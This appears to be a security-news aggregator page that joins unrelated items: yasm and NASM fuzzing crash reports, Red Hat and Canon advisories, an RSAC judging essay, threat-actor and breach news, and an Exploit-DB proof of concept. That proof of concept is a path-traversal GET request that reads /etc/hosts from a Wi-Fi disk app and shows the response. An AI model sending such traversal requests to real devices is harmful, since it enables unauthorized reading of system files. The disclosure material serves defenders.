yasm 1.3.0.55.g101bc was discovered to contain a segmentation violation via the function expand_mmac_params at /nasm/nasm-pp.c.

Permalink

Cannot retrieve contributors at this time

**There exists SEGV in yasm/modules/preprocs/nasm/nasm-pp.c:4008 in expand\_mmac\_params****Project：**

https://github.com/yasm/yasm

**asan info:**

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==3645333==ERROR: AddressSanitizer: SEGV on unknown address 0x60bcf518f500 (pc 0x562c742f3049 bp 0x7ffc6fb07330 sp 0x7ffc6fb07200 T0)
    ==3645333==The signal is caused by a READ memory access.
        #0 0x562c742f3048 in expand_mmac_params modules/preprocs/nasm/nasm-pp.c:4008
        #1 0x562c742ead70 in do_directive modules/preprocs/nasm/nasm-pp.c:2950
        #2 0x562c742fa446 in pp_getline modules/preprocs/nasm/nasm-pp.c:5083
        #3 0x562c742d7c61 in nasm_preproc_get_line modules/preprocs/nasm/nasm-preproc.c:198
        #4 0x562c742cc4ed in nasm_parser_parse modules/parsers/nasm/nasm-parse.c:219
        #5 0x562c742caf6c in nasm_do_parse modules/parsers/nasm/nasm-parser.c:66
        #6 0x562c742cb109 in nasm_parser_do_parse modules/parsers/nasm/nasm-parser.c:83
        #7 0x562c742634d4 in do_assemble frontends/yasm/yasm.c:521
        #8 0x562c74264281 in main frontends/yasm/yasm.c:753
        #9 0x7f44d85c0082 in __libc_start_main ../csu/libc-start.c:308
        #10 0x562c74261b9d in _start (/root/target/yasm/build_asan/bin/yasm+0xa5b9d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV modules/preprocs/nasm/nasm-pp.c:4008 in expand_mmac_params
    ==3645333==ABORTING
    

**Command Input:**

./yasm poc-file

poc-file.zip

poc-file is attached.

**Environment**

OS: Ubuntu 20.04.1 yasm: 1.3.0.55.g101bc (git clone git@github.com:yasm/yasm.git , and compile it) compile yasm with asan: ./autogen.sh make distclean ./configure --prefix=$PWD/build\_asan make CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" make install You can also reproduce it without ASAN , don't set CFLAGS and CXXFLAGS and directly use GDB.

**GDB results:**

we use "p mac->params\[n\]"but can't access memory. SEGV happens.

CVE-2023-31723: fuzzing-vulncollect/README.md at main · DaisyPo/fuzzing-vulncollect

yasm 1.3.0.55.g101bc was discovered to contain a heap-use-after-free via the function expand_mmac_params at yasm/modules/preprocs/nasm/nasm-pp.c.

    ==708699==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e0000012a8 at pc 0x55647c385147 bp 0x7ffe09f5d870 sp 0x7ffe09f5d860
    READ of size 8 at 0x60e0000012a8 thread T0
        #0 0x55647c385146 in expand_mmac_params modules/preprocs/nasm/nasm-pp.c:3878
        #1 0x55647c38d436 in pp_getline modules/preprocs/nasm/nasm-pp.c:5078
        #2 0x55647c36ac61 in nasm_preproc_get_line modules/preprocs/nasm/nasm-preproc.c:198
        #3 0x55647c35f4ed in nasm_parser_parse modules/parsers/nasm/nasm-parse.c:219
        #4 0x55647c35df6c in nasm_do_parse modules/parsers/nasm/nasm-parser.c:66
        #5 0x55647c35e109 in nasm_parser_do_parse modules/parsers/nasm/nasm-parser.c:83
        #6 0x55647c2f64d4 in do_assemble frontends/yasm/yasm.c:521
        #7 0x55647c2f7281 in main frontends/yasm/yasm.c:753
        #8 0x7fc63b1af082 in __libc_start_main ../csu/libc-start.c:308
        #9 0x55647c2f4b9d in _start (/root/target/yasm/build_asan/bin/yasm+0xa5b9d)
    
    0x60e0000012a8 is located 8 bytes inside of 160-byte region [0x60e0000012a0,0x60e000001340)
    freed by thread T0 here:
        #0 0x7fc63b48a40f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:122
        #1 0x55647c331974 in def_xfree libyasm/xmalloc.c:113
        #2 0x55647c370a59 in free_mmacro modules/preprocs/nasm/nasm-pp.c:1163
        #3 0x55647c38cc0a in pp_getline modules/preprocs/nasm/nasm-pp.c:5009
        #4 0x55647c36ac61 in nasm_preproc_get_line modules/preprocs/nasm/nasm-preproc.c:198
        #5 0x55647c35f4ed in nasm_parser_parse modules/parsers/nasm/nasm-parse.c:219
        #6 0x55647c35df6c in nasm_do_parse modules/parsers/nasm/nasm-parser.c:66
        #7 0x55647c35e109 in nasm_parser_do_parse modules/parsers/nasm/nasm-parser.c:83
        #8 0x55647c2f64d4 in do_assemble frontends/yasm/yasm.c:521
        #9 0x55647c2f7281 in main frontends/yasm/yasm.c:753
        #10 0x7fc63b1af082 in __libc_start_main ../csu/libc-start.c:308
    
    previously allocated by thread T0 here:
        #0 0x7fc63b48a808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
        #1 0x55647c331857 in def_xmalloc libyasm/xmalloc.c:69
        #2 0x55647c37ffc8 in do_directive modules/preprocs/nasm/nasm-pp.c:3211
        #3 0x55647c38d446 in pp_getline modules/preprocs/nasm/nasm-pp.c:5083
        #4 0x55647c36ac61 in nasm_preproc_get_line modules/preprocs/nasm/nasm-preproc.c:198
        #5 0x55647c35f4ed in nasm_parser_parse modules/parsers/nasm/nasm-parse.c:219
        #6 0x55647c35df6c in nasm_do_parse modules/parsers/nasm/nasm-parser.c:66
        #7 0x55647c35e109 in nasm_parser_do_parse modules/parsers/nasm/nasm-parser.c:83
        #8 0x55647c2f64d4 in do_assemble frontends/yasm/yasm.c:521
        #9 0x55647c2f7281 in main frontends/yasm/yasm.c:753
        #10 0x7fc63b1af082 in __libc_start_main ../csu/libc-start.c:308
    
    SUMMARY: AddressSanitizer: heap-use-after-free modules/preprocs/nasm/nasm-pp.c:3878 in expand_mmac_params
    Shadow bytes around the buggy address:
      0x0c1c7fff8200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1c7fff8210: 00 00 00 00 fa fa fa fa fa fa fa fa 00 00 00 00
      0x0c1c7fff8220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1c7fff8230: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
      0x0c1c7fff8240: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
    =>0x0c1c7fff8250: fa fa fa fa fd[fd]fd fd fd fd fd fd fd fd fd fd
      0x0c1c7fff8260: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
      0x0c1c7fff8270: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c1c7fff8280: fd fd fd fd fa fa fa fa fa fa fa fa fd fd fd fd
      0x0c1c7fff8290: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c1c7fff82a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==708699==ABORTING
    

poc-file is attached.

OS: Ubuntu 20.04.1  
yasm: 1.3.0.55.g101bc (git clone git@github.com:yasm/yasm.git , and compile it)  
compile yasm with asan:  
./autogen.sh  
make distclean  
./configure --prefix=$PWD/build\_asan  
make CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g"  
make install

CVE-2023-31725: There exists heap-use-after-free in yasm/modules/preprocs/nasm/nasm-pp.c:3878 in expand_mmac_params · Issue #221 · yasm/yasm

There exists a heap buffer overflow in nasm 2.16.02rc1 (GitHub commit: b952891).

Self-registration is disabled due to spam issue (mail gorcunov@gmail.com or hpa@zytor.com to create an account)

**Bug 3392857** \- Heap-Buffer-Overflow in NASM( asm/preproc.c:6863 in expand\_mmacro)

Summary: Heap-Buffer-Overflow in NASM( asm/preproc.c:6863 in expand\_mmacro)

Status:

OPEN

Alias:

None

Product:

NASM

Classification:

Unclassified

Component:

Assembler (show other bugs)

Version:

2.16.xx

Hardware:

All Linux

Importance:

Medium normal

Assignee:

nobody

URL:

Depends on:

Blocks:

Reported:

2023-04-10 23:10 PDT by Daisy Chen

Modified:

2023-04-11 03:51 PDT (History)

CC List:

5 users (show)

Obtained from:

Build from source archive using configure

  

Attachments

**poc file to reproduce the problem** (1.57 KB, text/plain)  
2023-04-10 23:10 PDT, Daisy Chen

Details

**a new poc file that can run nasm without asan and we can analyze it with GDB** (2.92 KB, text/plain)  
2023-04-11 03:51 PDT, Daisy Chen

Details

Add an attachment (proposed patch, testcase, etc.)

  

Note You need to log in before you can comment on or make changes to this bug.

CVE-2023-31722: 3392857 – Heap-Buffer-Overflow in NASM( asm/preproc.c:6863 in expand_mmacro)

Red Hat Security Advisory 2023-1327-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.13.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.13.0 security update  
Advisory ID:       RHSA-2023:1327-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1327  
Issue date:        2023-05-17  
CVE Names:         CVE-2022-2990 CVE-2022-3259 CVE-2022-41717  
                   CVE-2022-41723 CVE-2022-41724 CVE-2022-41725  
                   CVE-2023-0056 CVE-2023-0229 CVE-2023-0778  
                   CVE-2023-25577 CVE-2023-25725  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.13.0 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.13.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.13.0. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2023:1326

Security Fix(es):

* golang: net/http: excessive memory growth in a Go server accepting HTTP/2  
requests (CVE-2022-41717)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* [LSO]Error message about "ErrorFindingMatchingDisk"  is not clear for cr  
localvolume when no volume attached to worker (BZ#2053505)

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.13 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2053505 - [LSO]Error message about "ErrorFindingMatchingDisk"  is not clear for cr localvolume when no volume attached to worker  
2161274 - CVE-2022-41717 golang: net/http: excessive memory growth in a Go server accepting HTTP/2 requests

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-10381 - [4.13] vDPA vf cannot be created  
OCPBUGS-10702 - Fixing Topology DS pods startup  
OCPBUGS-10729 - NodeFeatureDiscovery CR Status is not populated/updated anymore  
OCPBUGS-10782 - Fixing the the release manifests directory to point to stable  
OCPBUGS-10896 - CNF Upstream MultiNetworkPolicy SR-IOV integration backport 4.13  
OCPBUGS-11065 - Pod annotaion key k8s.v1.cni.cncf.io/networks-status is changed  
OCPBUGS-3057 - SR-IOV | Connectivity doesn't work with iPv6+static mac on top of i40e driver  
OCPBUGS-3624 - End2End tests fail due to lack of Pod Security Admission  
OCPBUGS-3671 - Update image version to 4.12 in cluster-nfd-operator github repo config/manifests/bases/nfd.clusterserviceversion.yaml  
OCPBUGS-3679 - NFD cluster-nfd-operator make image support for arm64 deployment from github repo needs Dockerfile updates  
OCPBUGS-3682 - Allow multiple NFD CR in the cluster  
OCPBUGS-3683 - Allow multiple NFD CR in the cluster  
OCPBUGS-3689 - NFD does not properly detect AMD processors  
OCPBUGS-3707 - NFD operator default namespace openshift-nfd needs specific pod security labels added for OCP 4.12  
OCPBUGS-3745 - Replace deprecated go get in Makefile  
OCPBUGS-3747 - Changing kustomize version  
OCPBUGS-3815 - Update skipper configuration in NFD operator  
OCPBUGS-3838 - Adding local ARM compilation/build configuration  
OCPBUGS-3906 - Fix bundle for release-4.12  
OCPBUGS-396 - LSO should warn that diskmaker can't run because of taints  
OCPBUGS-4066 - fix operator naming convention  
OCPBUGS-4346 - fix operator naming convention  
OCPBUGS-4462 - fix incorrect format of old skipRange  
OCPBUGS-4722 - update sriov csv to 4.13 from 4.12  
OCPBUGS-5178 - BF2 is not converted to nic mode after applied converting machineConfig  
OCPBUGS-5293 - Current State  api call for os-clock-state creates nil pointer-Dual Nic  
OCPBUGS-5377 - Multiple times switching slave port to  fault causes the port state to remain in HOLDOVER  
OCPBUGS-5822 - NFD topologyupdater functionality missing on OCP 4.12 when deploying NFD from bundle  
OCPBUGS-6184 - Update 4.13 sriov-network-device-plugin image to be consistent with ART  
OCPBUGS-701 - SR-IOV VFs may get reseted after being allocated by other pods  
OCPBUGS-7826 - Multi node http service support not working for consumer  
OCPBUGS-7856 - [4.13] ovnkube pod crashed after enable ovs hardware offload in baremetal cluster

6. References:

https://access.redhat.com/security/cve/CVE-2022-2990  
https://access.redhat.com/security/cve/CVE-2022-3259  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2022-41723  
https://access.redhat.com/security/cve/CVE-2022-41724  
https://access.redhat.com/security/cve/CVE-2022-41725  
https://access.redhat.com/security/cve/CVE-2023-0056  
https://access.redhat.com/security/cve/CVE-2023-0229  
https://access.redhat.com/security/cve/CVE-2023-0778  
https://access.redhat.com/security/cve/CVE-2023-25577  
https://access.redhat.com/security/cve/CVE-2023-25725  
https://access.redhat.com/security/updates/classification/#moderate  
https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGRr2tzjgjWX9erEAQhYQg/+KWtiMPF6zFMjxpFDF5aTBUml4saZPmEr  
CzzBZQwLqMkBXo6wdRSdWl9KDCiVbIagIyWVXA1iknSQTKE0hvsXN214hCnTYjAY  
72mFujn6WyuonhYvSJRja0+b0qI7m/5dScB22dy4+0sCtoIgX8bHXvI3NACNXwRV  
wvWS14+n7f5eiQku9tmsu4IMuPfjqS81kbYLqsCCPeguZwu6sYYypl9OtbUN0rTt  
mWtFVb+/4Zd0l9cRNM3oM00pMIKr1YUZ9sk1wfMo+sofZiaZFH5X04y9pLFA/Jty  
Q5xzCfniJnTkcgqyuf/549jdK0/QfNfkHWgRvjkIxP/nN8W51SAaj+KchjBWLImL  
KBNji+MwGsw+2QpZBVOz9FtzyMVAdq9CNimoQWmQdKd2GW0Vm3mpNFPKX7jYGiAJ  
rDZhHRSVn00VtPzWPFmS2UzK3fhPCs0UXOtgf4WD5Ruf0aht0k0LMwbVfo5HIgaJ  
CICF6+B2FyNuUnxSzIAAFF1lEc+tcqooUr21sWCZBMO4NeUKK15IKY9vqGjKxMWY  
+rNFLJXdpZaHmzMRgNolEI/VFOzlrgVUK7MpGjzu/ojxJfdP/efrN+YNqrp898dd  
BZpnh6aqt34yAY6TonYToYqw0Q2He425cMx+wwoAssR3EeKOhcU6NbtazSWzJdX0  
m4IyVpJlAgE=rvUW  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1327-01

Three pieces of advice to startups serious about winning funding and support for their nascent companies: Articulate your key message clearly, have the founder speak, and don't use a canned demo.

It was a great honor to serve as one of five judges for this year's RSAC Innovation Sandbox competition — the premier place to pitch your early-stage cybersecurity startup. Congratulations to the top two contenders, with Hidden Layer winning the award and Pangea Cyber taking the No. 2 spot. Keep an eye on these companies — and all this year's top 10 finalists.

Over the 17 years it's been running, the RSAC contest's 170 top 10 finalists have been involved in 75 acquisitions and received nearly $12.5 billion in investments. Last year, Talon Cyber Security and its Secure Enterprise Browser won the top honor, propelling the startup into new markets and catching the attention of many CISOs in the Fortune Global 2000. In earlier years, Phantom Cyber won the contest when its founder and CEO, Oliver Friedrichs, gave an unforgettable pitch — and just two years later, the company was acquired by Splunk. (Friedrichs is now founder and CEO of Pangea.)

As a venture capitalist, serving as a judge has reminded me of the incredible people in our industry and the remarkable innovations that will not only create new categories but also put a real dent in the cybersecurity challenges that enterprises face today.

As a new judge, I didn't exactly know what to expect, but it was a rewarding experience. I was impressed with the other judges and the varied and interesting perspectives they each brought to the table. My co-judges were Christopher Young, executive VP of business development, strategy, and ventures at Microsoft; Niloofar Razi Howe, senior operating partner at Energy Impact Partners; Shlomo Kramer, co-founder and CEO of Cato Networks; and Paul Kocher, an independent security researcher and founder of Cryptography Research.

Together we spent untold hours watching the pitch videos that contestants sent in. (I'd love to say how many, but I'm not at liberty to do so. I can tell you it was a _lot_ of them.) This was time consuming, but truly inspiring to see what people are working on and building toward in this industry.

**Giving a Voice to Future Trends**

I'm a true believer in the mission of the RSAC Innovation Sandbox, which is a stage to highlight the brightest startups every year. With 45,000 peers now attending the annual RSA Conference, the contest provides an important forum for early-stage companies to talk about how they're shaping our industry. For companies that typically have very little visibility, this type of opportunity — at such a critical time — can also really accelerate their fundraising and future.

One thing that struck me from listening to all those pitches is how important it is to be able to articulate your key messages in just three minutes. As a VC, I'm used to listening to pitches that run anywhere from 30 minutes to two hours. The RSAC Innovation Sandbox contestants must give their spiel and convince the judges why they should win in the time it would take to compose a short email. The pitches we saw ran the gamut from fast-talking and fact-filled to entertaining and fun. But my three pieces of advice to future contestants that are serious about winning would be:

*   **Cover the basics — and land them.** State the problem you're solving; explain what makes your solution unique; discuss the size of the addressable market; and talk about your early market traction. These are the key things judges want to hear to show you have a shot at success.

*   **Have your founder be your leader — always.** Judges want to know how the company got started and the founder or founders' vision for their company. A few of the pitches were delivered by salespeople, engineers, or just someone other than the founder. But founders are the soul of the company, and the best people to tell the story.

*   **Don't use a canned demo.** This is possibly your one opportunity to tell your story in front of a panel of carefully selected experts, and you want to make it worth their while. I would say one out of every five of the pitches were canned demos. This isn't a webinar. Don't treat it like one.

**Innovation Trends**

Now, back to the topic of innovation. Two big trends stood out to me this year.

*   **AppSec is back and better than ever.** We're seeing a big shift right now in how software engineers view application security. Developers are becoming more security-aware and are organically adopting tools that help them shift-left and address security at the beginning of the development process. There were a number of Sandbox finalists providing developer solutions for identifying security vulnerabilities faster and more accurately. The industry has been talking about building security into the fabric of software forever and now it's finally happening.

*   **The future is now.** Web3 is emerging as a new technology architecture for decentralized blockchain technologies and token-based systems such as crypto. One finalist offers a security operations center that protects Web3 digital assets. And, of course, we had plenty of representation from companies focused on artificial intelligence and machine learning in response to increasingly sophisticated cyberattacks.

After serving as a judge in this year's RSAC Innovation Sandbox, one thing is clear: The future is bright — and secure.

For more information on the Top 10 RSA Innovation Sandbox finalists, Dark Reading published a comprehensive overview.

I Was an RSAC Innovation Sandbox Judge — Here's What I Learned

savysoda Wifi HD Wireless Disk Drive 11 is vulnerable to Local File Inclusion.

    # Exploit Title: Wifi HD Wireless Disk Drive 11 - Local File Inclusion
    # Date: Aug 13, 2022
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: http://www.savysoda.com
    # Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/id311170976
    # Version: 11
    # Tested on: iPhone OS 15_5
    
    # Proof of Concept
    GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
    Host: 192.168.1.100
    Connection: close
    Upgrade-Insecure-Requests: 1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X)
    AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5  Safari/604.1
    Referer: http://192.168.1.103/
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
    Accept-Encoding: gzip, deflate
    
    
    -----------------
    
    HTTP/1.1 200 OK
    Content-Disposition: attachment
    Content-Type: application/download
    Content-Length: 213
    Accept-Ranges: bytes
    Date: Sat, 13 Aug 2022 03:33:30 GMT
    
    ##
    # Host Database
    #
    # localhost is used to configure the loopback interface
    # when the system is booting.  Do not change this entry.
    ##
    127.0.0.1 localhost
    255.255.255.255 broadcasthost
    ::1             localhost

CVE-2023-31904: OffSec’s Exploit Database Archive

A financially motivated cyber actor has been observed abusing Microsoft Azure Serial Console on virtual machines (VMs) to install third-party remote management tools within compromised environments.
Google-owned Mandiant attributed the activity to a threat group it tracks under the name UNC3944, which is also known as Roasted 0ktapus and Scattered Spider.
"This method of attack was unique in

SIM Swapping / Server Security

A financially motivated cyber actor has been observed abusing Microsoft Azure Serial Console on virtual machines (VMs) to install third-party remote management tools within compromised environments.

Google-owned Mandiant attributed the activity to a threat group it tracks under the name **UNC3944**, which is also known as Roasted 0ktapus and Scattered Spider.

"This method of attack was unique in that it avoided many of the traditional detection methods employed within Azure and provided the attacker with full administrative access to the VM," the threat intelligence firm said.

The emerging adversary, which first came to light in late last year, is known to leverage SIM swapping attacks to breach telecommunications and business process outsourcing (BPO) companies since at least May 2022.

Subsequently, Mandiant also found UNC3944 utilizing a loader named STONESTOP to install a malicious signed driver dubbed POORTRY that's designed to terminate processes associated with security software and delete files as part of a BYOVD attack.

It's currently not known how the threat actor conducts the SIM swaps, although the initial access methodology is suspected to involve the use of SMS phishing messages targeting privileged users to obtain their credentials and then staging a SIM swap to receive the two-factor authentication (2FA) token to a SIM card under their control.

Armed with the elevated access, the threat actor then moves to survey the target network by exploiting Azure VM extensions such as Azure Network Watcher, Azure Windows Guest Agent, VMSnapshot, and Azure Policy guest configuration.

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

"Once the attacker completes their reconnaissance, they employ the serial console functionality in order to gain an administrative command prompt inside of an Azure VM," Mandiant said, adding it observed UNC3944 making use of PowerShell to deploy legitimate remote administration tools.

The development is yet another evidence of attackers taking advantage of living-off-the-land (LotL) techniques to sustain and advance an attack, while simultaneously circumventing detection.

"The novel use of the serial console by attackers is a reminder that these attacks are no longer limited to the operating system layer," Mandiant said.

"Unfortunately, cloud resources are often poorly misunderstood, leading to misconfigurations that can leave these assets vulnerable to attackers. While methods of initial access, lateral movement, and persistence vary from one attacker to another, one thing is clear: Attackers have their eyes on the cloud."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Threat Group UNC3944 Abusing Azure Serial Console for Total VM Takeover

Canon IJ Network Tool/Ver.4.7.5 and earlier (supported OS: OS X 10.9.5-macOS 13),IJ Network Tool/Ver.4.7.3 and earlier (supported OS: OS X 10.7.5-OS X 10.8) allows an attacker to acquire sensitive information on the Wi-Fi connection setup of the printer from the communication of the software.

**Description**

A couple of vulnerabilities have been identified for IJ Network Tool (Hereafter, the Software). These vulnerabilities suggest the possibility that an attacker connected to the same network as the printer may be able to acquire sensitive information on the Wi-Fi connection setup of the printer by using the Software or by referring to its communication.

**Affected Products/Versions**

IJ Network Tool/Ver.4.7.5 and earlier (supported OS: OS X 10.9.5-macOS 13)

IJ Network Tool/Ver.4.7.3 and earlier (supported OS: OS X 10.7.5-OS X 10.8)

**CVE/CVSS**

CVE-2023-1763:

Acquisition of sensitive information on the Wi-Fi connection setup of the printer from the Software

 

CVSS v3  CVSS: 3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N   Base Score: 6.5

CVE-2023-1764:

Acquisition of sensitive information on the Wi-Fi connection setup of the printer from the communication of the Software

 

CVSS v3  CVSS: 3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N   Base Score: 6.5

**Mitigation/Remediation**

For CVE-2023-1763:

The workaround for this vulnerability is to use printers with a trusted network connection. Please refer here for “Securing products when connecting to a network”. In addition, the Software designed to address this issue will be released accordingly.

For CVE-2023-1764:

The workaround for this vulnerability is to use printers with a trusted network connection. Please refer here for “Securing products when connecting to a network”.

CVE-2023-1764: CP2023-002 Vulnerabilities of IJ Network Tool regarding Wi-Fi connection setup

Categories: News
Categories: Ransomware
Tags: PharMerica

Tags:  Money Message

Tags:  ransomware

Tags:  PII

Tags:  SSN

US pharmacy giant PharMerica has reported a cybersecurity incident that affects over 5.8 million people. The data theft has been claimed by ransomware group Money Message.



(Read more...)




The post PharMerica breach impacts almost 6 million people appeared first on Malwarebytes Labs.

US pharmacy giant PharMerica has notified over 5.8 million people about a security incident in which it says personal information and medical information may have been obtained by cybercriminals. The Data Breach Notification lists the total number of persons affected as 5,815,591.

An investigation was started after PharMerica noticed suspicious activity on its network. The investigation showed that an unauthorized party accessed PharMerica computer systems on March 12-13, 2023, and that this party may have had access to certain personal information. The incident was noticed on March 14, and a week later PharMerica identified that the personal information accessed included names, dates of birth, Social Security numbers, medication lists and health insurance information.

Ransomware group Money Message has claimed responsibility for the attack. The gang claims that they encrypted almost the entire PharMerica infrastructure, and has published parts of the stolen data to their leak site.

_Image courtesy of BleepingComputer_

Money Message is a new ransomware which targets both Windows and Linux systems. As we mentioned in our May ransomware review, Taiwanese PC parts maker MSI also fell victim to Money Message.

On its website PharMerica says:

> “At this point, PharMerica is not aware of any fraud or identity theft to any individual as a result of this incident, but is nonetheless notifying potentially affected individuals to provide them with more information and resources. The notice will include information on steps individuals can take to protect themselves against potential fraud or identity theft. PharMerica has arranged for complimentary identity protection and credit monitoring services for potentially affected individuals.”

An extra point of concern is that a relative large part of the people affected by the breach have passed away, which makes it unlikely that relatives will regularly monitor their credit reports, making any cybercrime related to the stolen data even more difficult to detect and stop.

**What to do if you've been caught in a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   Check the vendor's advice. Every breach is different, so check with the vendor to find out what's happened, and follow any specific advice they offer.
*   Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don't use for anything else. Better yet, let a password manager choose one for you.
*   Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.

**How to avoid ransomware**

*   **Block common forms of entry.** Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
*   **Prevent intrusions.** Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
*   **Detect intrusions.** Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption.** Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups.** Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

PharMerica breach impacts almost 6 million people

The MoroSystems EasyMind - Mind Maps plugin before 2.15.0 for Confluence allows persistent XSS when saving a Mind Map with the hyperlink parameter.

Tag

#mac